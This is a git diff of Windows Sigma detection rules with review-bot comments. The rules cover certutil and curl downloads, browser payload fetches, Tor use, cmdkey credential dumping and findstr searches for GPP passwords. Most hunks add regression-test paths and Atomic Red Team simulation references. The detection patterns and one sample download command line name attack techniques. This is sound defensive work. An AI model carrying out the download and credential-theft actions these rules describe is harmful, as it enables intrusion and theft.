--- a/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml +++ b/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml 
@@ -29,3 +29,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml b/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml index 05707be7d..079a5ff36 100644 --- a/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml +++ b/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml @@ -40,3 +40,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download.yml b/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download.yml index b93a5b353..7f371c32c 100644 --- a/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download.yml +++ b/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download.yml @@ -7,7 +7,7 @@ references: - https://lolbas-project.github.io/lolbas/Binaries/Msedge/ author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2022-01-11 -modified: 2023-11-09 +modified: 2025-10-27 tags: - attack.command-and-control - attack.t1105 
@@ -25,19 +25,31 @@ detection: selection_http: CommandLine|contains: 'http' selection_extensions: - CommandLine|endswith: - - '.7z' - - '.dat' - - '.dll' - - '.exe' - - '.hta' - - '.ps1' - - '.psm1' - - '.txt' - - '.vbe' - - '.vbs' - - '.zip' + - CommandLine|endswith: + - '.7z' + - '.dat' + - '.dll' + - '.exe' + - '.hta' + - '.ps1' + - '.psm1' + - '.txt' + - '.vbe' + - '.vbs' + - '.zip' + - CommandLine|contains: + - '.7z"' + - '.dat"' + - '.dll"' + - '.hta"' + - '.ps1"' + - '.psm1"' + - '.txt"' + - '.vbe"' + - '.vbs"' + - '.zip"' condition: all of selection_* falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_browsers_tor_execution.yml b/rules/windows/process_creation/proc_creation_win_browsers_tor_execution.yml index 2584b566d..c82b3202e 100644 --- a/rules/windows/process_creation/proc_creation_win_browsers_tor_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_browsers_tor_execution.yml @@ -6,7 +6,7 @@ references: - https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/ author: frack113 date: 2022-02-20 -modified: 2023-02-13 +modified: 2025-10-27 tags: - attack.command-and-control - attack.t1090.003 @@ -15,10 +15,13 @@ logsource: product: windows detection: selection: - Image|endswith: - - '\tor.exe' - - '\Tor Browser\Browser\firefox.exe' + - Description: 'Tor Browser' + - Product: 'Tor Browser' + - Image|endswith: + - '\tor.exe' + - '\Tor Browser\Browser\firefox.exe' condition: selection falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation.yml b/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation.yml index d97c7467f..0cf25ec27 100644 
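Review bot: The new quoted-argument branch of `selection_extensions` drops `.exe` — `CommandLine|endswith` still lists `.exe`, but the `CommandLine|contains` list goes straight from `.dll"` to `.hta"` with no `.exe"` — so `msedge.exe "https://host/payload.exe"` (the quoted form most launchers produce) no longer matches while the unquoted form does. If that is deliberate because of installer noise, it deserves a comment on the list (`# .exe" intentionally omitted: <reason>`); otherwise add `- '.exe"'` after `- '.dll"'`. Note also that `contains: '.zip"'` matches the extension anywhere in the command line rather than only as the URL's tail, which makes this branch slightly wider than the `endswith` one.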
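Review bot: The added `Description: 'Tor Browser'` and `Product: 'Tor Browser'` alternatives in the Tor rule depend on PE version-resource fields that only some event sources populate (Sysmon EID 1 does; Windows Security 4688 does not), so on a 4688-only pipeline the rule silently falls back to the two `Image|endswith` paths. A comment next to the new fields, e.g. `# Description/Product require Sysmon-style process-creation telemetry`, would make that coverage gap visible to whoever deploys it. Those fields are also attacker-controlled, so a rebuilt Tor binary with its version info stripped still evades — inherent, but worth one line under `falsepositives` or the description rather than leaving it implicit behind the `modified: 2025-10-27` bump.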
--- a/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation.yml +++ b/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation.yml @@ -33,3 +33,4 @@ detection: falsepositives: - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_certutil_decode.yml b/rules/windows/process_creation/proc_creation_win_certutil_decode.yml index 94a55c2ac..f5adf9a1e 100644 --- a/rules/windows/process_creation/proc_creation_win_certutil_decode.yml +++ b/rules/windows/process_creation/proc_creation_win_certutil_decode.yml @@ -30,3 +30,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_decode/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_certutil_download.yml b/rules/windows/process_creation/proc_creation_win_certutil_download.yml index d9e77b38c..383396186 100644 --- a/rules/windows/process_creation/proc_creation_win_certutil_download.yml +++ b/rules/windows/process_creation/proc_creation_win_certutil_download.yml @@ -33,3 +33,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_download/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml b/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml index 53f947fee..534127ee0 100644 --- a/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml +++ b/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml 
@@ -70,3 +70,4 @@ detection:
 falsepositives:
 - Unknown
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml b/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml
index 2ba1233f6..71c582b4f 100644
--- a/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml
+++ b/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml
@@ -67,3 +67,4 @@ detection:
 falsepositives:
 - Unknown
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_certutil_encode.yml b/rules/windows/process_creation/proc_creation_win_certutil_encode.yml
index 2994f73f4..7d39336b9 100644
--- a/rules/windows/process_creation/proc_creation_win_certutil_encode.yml
+++ b/rules/windows/process_creation/proc_creation_win_certutil_encode.yml
@@ -25,3 +25,4 @@ detection:
 falsepositives:
 - As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_encode/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml b/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml
index 0f50997da..346e89674 100644
--- a/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml
+++ b/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml
@@ -44,3 +44,4 @@ detection:
 falsepositives:
 - Unknown
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml b/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml
index b4a8cf6cf..40088482e 100644
--- a/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml
+++ b/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml
@@ -39,3 +39,4 @@ detection:
 falsepositives:
 - Unknown
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_certutil_export_pfx.yml b/rules/windows/process_creation/proc_creation_win_certutil_export_pfx.yml
index 37df08c33..523c0c39f 100644
--- a/rules/windows/process_creation/proc_creation_win_certutil_export_pfx.yml
+++ b/rules/windows/process_creation/proc_creation_win_certutil_export_pfx.yml
@@ -23,3 +23,4 @@ detection:
 falsepositives:
 - There legitimate reasons to export certificates. Investigate the activity to determine if it's benign
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml b/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml
index 0797a090d..68bd35a2b 100644
--- a/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml
+++ b/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml
@@ -25,3 +25,4 @@ detection:
 falsepositives:
 - Unknown
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml b/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml
index ea4a95808..d9fc9e19a 100644
--- a/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml
+++ b/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml
@@ -31,3 +31,4 @@ falsepositives:
 - During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command.
 - Discord was seen using chcp to look up code pages
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml b/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml
index 60284bb2b..8eed64669 100644
--- a/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml
+++ b/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml
@@ -28,3 +28,4 @@ detection:
 falsepositives:
 - Administrative activity (adjust code pages according to your organization's region)
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml b/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml
index fbcb5aa63..1dcc1fb5b 100644
--- a/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml
+++ b/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml
@@ -26,3 +26,9 @@ detection:
 falsepositives:
 - Unknown
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/info.yml
+simulation:
+ - type: atomic-red-team
+ name: Overwrite deleted data on C drive
+ technique: T1485
+ atomic_guid: 321fd25e-0007-417f-adec-33232252be19
diff --git a/rules/windows/process_creation/proc_creation_win_clip_execution.yml b/rules/windows/process_creation/proc_creation_win_clip_execution.yml
index cbfa3cbae..d418147a7 100644
--- a/rules/windows/process_creation/proc_creation_win_clip_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_clip_execution.yml
@@ -22,3 +22,9 @@ detection:
 falsepositives:
 - Unknown
 level: low
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_clip_execution/info.yml
+simulation:
+ - type: atomic-red-team
+ name: Utilize Clipboard to store or execute commands from
+ technique: T1115
+ atomic_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7
diff --git a/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution.yml b/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution.yml
index b514753cf..abd99334f 100644
--- a/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution.yml
@@ -29,3 +29,4 @@ detection:
 falsepositives:
 - Admin activity
 level: low
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_cmd_dir_execution.yml b/rules/windows/process_creation/proc_creation_win_cmd_dir_execution.yml
index 2f05817d3..2f56765a2 100644
--- a/rules/windows/process_creation/proc_creation_win_cmd_dir_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_cmd_dir_execution.yml
@@ -24,3 +24,9 @@ detection:
 falsepositives:
 - Likely
 level: low
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/info.yml
+simulation:
+ - type: atomic-red-team
+ name: List Internet Explorer Bookmarks using the command prompt
+ technique: T1217
+ atomic_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85
diff --git a/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml b/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml
index 41a6959c2..99cc9eff1 100644
--- a/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml
+++ b/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml
@@ -28,3 +28,4 @@ detection:
 falsepositives:
 - Unknown
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution.yml b/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution.yml
index 6f297d0bb..2daf4e788 100644
--- a/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution.yml
@@ -32,3 +32,4 @@ detection:
 falsepositives:
 - Unknown
 level: low
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml b/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml
index 8dee296e2..1e2d1ac7a 100644
--- a/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml
+++ b/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml
@@ -29,3 +29,9 @@ detection:
 falsepositives:
 - Legitimate usage for administration purposes
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/info.yml
+simulation:
+ - type: atomic-red-team
+ name: RDP to DomainController
+ technique: T1021.001
+ atomic_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e
diff --git a/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml b/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml
index 81e569894..9d976fddc 100644
--- a/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml
+++ b/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml
@@ -25,3 +25,9 @@ detection:
 falsepositives:
 - Legitimate administrative tasks
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml
+simulation:
+ - type: atomic-red-team
+ name: Cached Credential Dump via Cmdkey
+ technique: T1003.005
+ atomic_guid: 56506854-89d6-46a3-9804-b7fde90791f9
diff --git a/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell.yml b/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell.yml
index 733c4e2f5..fca6d3fca 100644
--- a/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell.yml
+++ b/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell.yml
@@ -32,3 +32,4 @@ detection:
 falsepositives:
 - Unknown
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_curl_susp_download.yml b/rules/windows/process_creation/proc_creation_win_curl_susp_download.yml
index 13ff16ec5..268902efb 100644
--- a/rules/windows/process_creation/proc_creation_win_curl_susp_download.yml
+++ b/rules/windows/process_creation/proc_creation_win_curl_susp_download.yml
@@ -64,3 +64,9 @@ detection:
 falsepositives:
 - Unknown
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_curl_susp_download/info.yml
+simulation:
+ - type: atomic-red-team
+ name: Curl Download File
+ technique: T1105
+ atomic_guid: 2b080b99-0deb-4d51-af0f-833d37c4ca6a
diff --git a/rules/windows/process_creation/proc_creation_win_dirlister_execution.yml b/rules/windows/process_creation/proc_creation_win_dirlister_execution.yml
index 047fd42fd..fb1cf36f1 100644
--- a/rules/windows/process_creation/proc_creation_win_dirlister_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_dirlister_execution.yml
@@ -17,8 +17,14 @@ logsource:
 detection:
 selection:
 - OriginalFileName: 'DirLister.exe'
- - Image|endswith: '\dirlister.exe'
+ - Image|endswith: '\DirLister.exe'
 condition: selection
 falsepositives:
 - Legitimate use by users
 level: low
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_dirlister_execution/info.yml
+simulation:
+ - type: atomic-red-team
+ name: Launch DirLister Executable
+ technique: T1083
+ atomic_guid: c5bec457-43c9-4a18-9a24-fe151d8971b7
diff --git a/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries.yml b/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries.yml
index 6d54b2bf6..6eeb4a48a 100644
--- a/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries.yml
+++ b/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries.yml
@@ -8,6 +8,7 @@ references:
 - https://github.com/redcanaryco/atomic-red-team/blob/75fa21076dcefa348a7521403cdd6bfc4e88623c/atomics/T1124/T1124.md
 author: lazarg
 date: 2025-06-12
+modified: 2025-10-25
 tags:
 - attack.discovery
 - attack.t1082
@@ -28,14 +29,26 @@ detection:
 - 'gpv'
 selection_keys:
 CommandLine|contains:
- - '\SYSTEM\CurrentControlSet\Control\TimeZoneInformation' # Contains time zone details
- - '\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces' # Holds network configuration details
+ - '\SOFTWARE\Microsoft\Windows Defender' # Details about defender state
 - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion' # Provides details about the OS
 - '\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall' # Lists installed programs
- - '\SOFTWARE\Microsoft\Windows Defender' # Details about defender state
+ - '\SYSTEM\CurrentControlSet\Control\TimeZoneInformation' # Contains time zone details
 - '\SYSTEM\CurrentControlSet\Services' # Details about existing services
- - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks' # Details about existing scheduled tasks
 condition: 1 of selection_cmd_* and selection_keys
 falsepositives:
 - Unlikely
 level: low
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/info.yml
+simulation:
+ - type: atomic-red-team
+ name: System Information Discovery
+ technique: T1010
+ atomic_guid: 66703791-c902-4560-8770-42b8a91f7667
+ - type: atomic-red-team
+ name: Discover OS Product Name via Registry
+ technique: T1082
+ atomic_guid: be3b5fe3-a575-4fb8-83f6-ad4a68dd5ce7
+ - type: atomic-red-team
+ name: Discover OS Build Number via Registry
+ technique: T1082
+ atomic_guid: acfcd709-0013-4f1e-b9ee-bc1e7bafaaec
diff --git a/rules/windows/process_creation/proc_creation_win_dism_remove.yml b/rules/windows/process_creation/proc_creation_win_dism_remove.yml
index 97cdc01e7..c54dcc8a8 100644
--- a/rules/windows/process_creation/proc_creation_win_dism_remove.yml
+++ b/rules/windows/process_creation/proc_creation_win_dism_remove.yml
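Review bot: Two paths are dropped from `selection_keys` — `'\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces'` and `'\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks'` — which removes the rule's coverage of network-configuration and scheduled-task enumeration, and nothing in the hunk records why. If they went because of false positives, a one-line comment on `selection_keys` naming the noisy source (or an entry under `falsepositives` instead of the unchanged `- Unlikely`) would keep that reasoning with the rule; otherwise they should stay. Separately, the first `simulation` entry pairs the name `System Information Discovery` with `technique: T1010`, but T1010 is Application Window Discovery while System Information Discovery is T1082 — the technique the rule already tags in the previous hunk — so that id looks like a slip and should be checked against the atomic's technique directory. The rule's `title` and `description` sit above the hunk and may still describe the dropped keys.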
@@ -37,3 +37,9 @@ detection:
 falsepositives:
 - Legitimate script
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_dism_remove/info.yml
+simulation:
+ - type: atomic-red-team
+ name: Disable Windows Defender with DISM
+ technique: T1562.001
+ atomic_guid: 871438ac-7d6e-432a-b27d-3e7db69faf58
diff --git a/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml b/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml
index 81f65698a..11b619fde 100644
--- a/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml
+++ b/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml
@@ -36,3 +36,4 @@ detection:
 falsepositives:
 - Legitimate usage by some scripts might trigger this as well
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_driverquery_recon/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml b/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml
index 67b75a3c7..641f13000 100644
--- a/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml
+++ b/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml
@@ -36,3 +36,4 @@ detection:
 falsepositives:
 - Legitimate use by third party tools in order to investigate installed drivers
 level: medium # Level could be reduced to low if this utility is often used in your environment
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_driverquery_usage/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml b/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml
index 14f203af0..698be9ee9 100644
--- a/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml
+++ b/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml
@@ -29,3 +29,9 @@ detection:
 falsepositives:
 - Legitimate use of the utilities by legitimate user for legitimate reason
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml
+simulation:
+ - type: atomic-red-team
+ name: Windows - Discover domain trusts with dsquery
+ technique: T1482
+ atomic_guid: 4700a710-c821-4e17-a3ec-9e4c81d6845f
diff --git a/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml b/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml
index 2af1bcea5..b130982ab 100644
--- a/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml
+++ b/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml
@@ -25,3 +25,4 @@ detection:
 falsepositives:
 - Unknown
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml b/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml
index 3a6d4ad67..340498e87 100644
--- a/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml
+++ b/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml
@@ -26,3 +26,4 @@ detection:
 falsepositives:
 - Unknown
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml b/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml
index 160781174..2e0593d10 100644
--- a/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml
+++ b/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml
@@ -30,3 +30,9 @@ detection:
 falsepositives:
 - Unknown
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml
+simulation:
+ - type: atomic-red-team
+ name: GPP Passwords (findstr)
+ technique: T1552.006
+ atomic_guid: 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f
diff --git a/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml b/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml
index d0109ba14..c9ec8ad56 100644
--- a/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml
+++ b/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml
@@ -35,3 +35,4 @@ detection:
 falsepositives:
 - Unknown
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_findstr_lsass/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml b/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml
index 9d6198045..1d121bd40 100644
--- a/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml
+++ b/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml
@@ -42,3 +42,4 @@ detection:
 falsepositives:
 - Unknown
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output.yml b/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output.yml
index b7a32c0aa..0ed490719 100644
--- a/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output.yml
+++ b/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output.yml
@@ -42,3 +42,4 @@ detection:
 falsepositives:
 - Unknown
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml b/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml
index c965a45a0..78f130528 100644
--- a/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml
+++ b/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml
@@ -61,3 +61,9 @@ detection:
 falsepositives:
 - Unknown
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml
+simulation:
+ - type: atomic-red-team
+ name: Security Software Discovery
+ technique: T1518.001
+ atomic_guid: f92a380f-ced9-491f-b338-95a991418ce2
diff --git a/rules/windows/process_creation/proc_creation_win_finger_execution.yml b/rules/windows/process_creation/proc_creation_win_finger_execution.yml
index d2e22093a..b14b595e7 100644
--- a/rules/windows/process_creation/proc_creation_win_finger_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_finger_execution.yml
@@ -26,3 +26,4 @@ detection:
 falsepositives:
 - Admin activity (unclear what they do nowadays with finger.exe)
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_finger_execution/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_gpresult_execution.yml b/rules/windows/process_creation/proc_creation_win_gpresult_execution.yml
index 358a4eb04..7a9a55b67 100644
--- a/rules/windows/process_creation/proc_creation_win_gpresult_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_gpresult_execution.yml
@@ -25,3 +25,9 @@ detection:
 falsepositives:
 - Unknown
 level: medium
+simulation:
+ - type: atomic-red-team
+ name: Display group policy information via gpresult
+ technique: T1615
+ atomic_guid: 0976990f-53b1-4d3f-a185-6df5be429d3b
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_gpresult_execution/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml b/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml
index 382358d0d..88ee725ac 100644
--- a/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml
@@ -25,3 +25,4 @@ detection:
 falsepositives:
 - False positives are expected with legitimate ".CHM"
 level: low
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml b/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml
index 358a69e68..9eabdbe7e 100644
--- a/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml
+++ b/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml
@@ -39,3 +39,4 @@ detection:
 falsepositives:
 - Authorized administrative activity
 level: high
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml
diff --git a/rules/windows/process_creation/proc_creation_win_pua_adfind_execution.yml b/rules/windows/process_creation/proc_creation_win_pua_adfind_execution.yml
index 05f44f4b0..45d17f55e 100644
--- a/rules/windows/process_creation/proc_creation_win_pua_adfind_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_pua_adfind_execution.yml
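Review bot: In the gpresult hunk `simulation` is inserted before `regression_tests_path`, whereas every other rule touched by this commit appends `regression_tests_path` first and `simulation` after it (for example `proc_creation_win_cipher_overwrite_deleted_data.yml` and `proc_creation_win_findstr_security_keyword_lookup.yml`). Swapping the two blocks here keeps the trailing metadata in one order across the rule set, which makes it easier to eyeball and to lint for. YAML parsing is indifferent to the order, so this is purely a consistency point.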
@@ -33,3 +33,4 @@ detection:
 falsepositives:
 - Unknown
 level: medium
+regression_tests_path: regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/info.yml
